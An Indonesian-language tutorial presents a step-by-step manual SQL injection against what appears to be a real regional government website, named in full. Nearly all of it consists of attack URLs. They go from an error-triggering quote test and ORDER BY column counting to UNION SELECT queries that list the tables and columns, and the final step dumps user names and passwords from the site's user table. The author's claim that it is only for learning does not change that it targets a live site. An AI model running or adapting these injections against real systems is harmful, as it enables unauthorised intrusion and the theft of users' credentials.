Cara Manual SQL injection

MANUAL SQL INJECTION
 
sekarang saya akan memberikan salah-satu cara step by step SQL Injection pada salah satu website. Hanya dengan maksut memberikan pembelajaran kepada teman-teman saja.. saya bukan heckel atau creckel.. saya hanya manusia biasa yang mencoba terus belajar dan belajar..
langsung saja pada Link dibawah ini:

http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=1

step 1

http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=1'

coba dengan memasukan tanda petik jika terjadi syntaq errore maka terjadi vulnerability
contoh "pagingquery gagal You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' limit 0,2' at line 2"

step 2 = Untuk mencari column gunakan perintah order by. order by 1-- , order by 2-- dst. sampai muncul pesan errore

http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 order by 1--

http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 order by 2--
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 order by 3--

http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 order by 4--

http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 order by 5--

step 3 = untuk mencari angka yang dimana untuk kita lakukan di langkah selanjutnya..
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select 1,2,3,4--

step 4 = untuk mencari tahu versi sql nya.. disini versi 5x. kalau kalian menemukan versi 4x. cari aja yang lain,,

 http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select version(),2,3,4,--

step5
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--

step6 = 0x6D656E7561646D696E adalah Hex dari string menuadmin
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x6D656E7561646D696E--

step7
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1+union+all+select+1%2Cgroup_concat%28menu%2C0x3a%29%2C3%2C4+from+menuadmin

step8 = 0x75736572 adalah Hex dari string user
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x75736572--

step9
http://paniaikab.go.id/showindex.php?page=main%2Fperundangan%2Fdet_perundangan&id=-1 union all select 1,group_concat(user,password),3,4 from user--

untuk keterangan lebih detail di setiap step-stepnya bisa hubungi pihak google.. haha
masa di suapin mulu,,, ya agak belajar sendiri dong... hehe
belajar terus kawan...